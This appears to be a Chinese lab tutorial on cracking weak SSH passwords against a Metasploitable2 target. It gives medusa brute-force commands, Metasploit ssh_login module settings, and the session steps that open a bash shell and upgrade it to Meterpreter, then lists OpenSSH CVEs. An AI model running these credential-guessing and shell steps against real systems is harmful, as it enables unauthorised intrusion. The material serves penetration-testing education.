4.4、漏洞利用-SSH弱口令破解

目录

4.4、SSH弱口令破解

1、medusa SSH弱口令破解

2、ssh命令行工具登录

3、利用metasploit利用ssh登录反弹shell

4、利用metasploit获取meterpreter shell

5、SSH历史相关漏洞


 

4.4、SSH弱口令破解

1、medusa SSH弱口令破解

medusa(美杜莎)工具

        medusa支持破解的服务类型包括以下类型

medusa -d  //查看medusa支持破解的服务

b8b3390a298cdfdc37fb23ce8191c2ad.png

 查看语法

medusa -h host(-H file)-u username (-U userfile) -p password (-P passfile) -C file -M module

0dba700d802e7879755accff263e863d.png

 

破解原理:ssh服务用户名和密码弱口令

攻击机:kali 192.168.12.128

靶机:metasploitable2 192.168.12.129

medusa -h 192.168.xx.xx -u msfadmin -p msfadmin -M ssh
注释:-h,指定目标主机;-u,用户名;-U,用户字典;
-p,密码;-P,密码字典;-M指定破解服务类型

2cd16c528763ad5a4fc087928f018b6e.png

 

2、ssh命令行工具登录

  ssh 用户名@IP地址

  输入密码即可登录

 

3、利用metasploit利用ssh登录反弹shell

攻击机:kali ip=192.168.12.128
靶机:metasploitable2、IP=192.168.12.129

使用metasploit进行ssh登录,会自动建立对应的bash shell连接。

use auxiliary/scanner/ssh/ssh_login  //使用模块
show options   //查看参数

fc44fee2091df8062933c1e9b00ef9c7.png

set rhosts 192.168.12.129
set username msfadmin
set password msfadmin
run
//设置参数

4c2c41a685d619ae2b43f96ae4afc612.png

sessions -l        //查看连接的会话(shell)

a39eec38b9e7bde99437a24392b95603.png

sessions -i 会话id //连接会话

849f0a58ae79910c3c0dd6b8c6c19f09.png

abdc0f6f2377dfacb3a7c1ff65eeef1c.png

4、利用metasploit获取meterpreter shell

  利用上一步获取的bash shell,注入meterpreter payload,从而获取更强大功能的shell。

sessions -u 会话id  //注入payload

b934ec85eb30f01de407955034e38a3f.png

sessions -l            //查看
sessions -i shell id   //利用shell

8a35c31bb4e3fccb3c1b85f9d7df2ad4.png

894380bd8738265b0310252cb47e1401.png

 

5、SSH历史相关漏洞

OpenSSH CBC模式信息泄露漏洞(CVE-2008-5161)

OpenSSH 安全漏洞(CVE-2017-15906)

OpenSSH 用户枚举漏洞(CVE-2018-15473)

OpenSSH 用户枚举漏洞(CVE-2018-15919)

OpenSSH 双重释放漏洞(CVE-2021-28041)

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值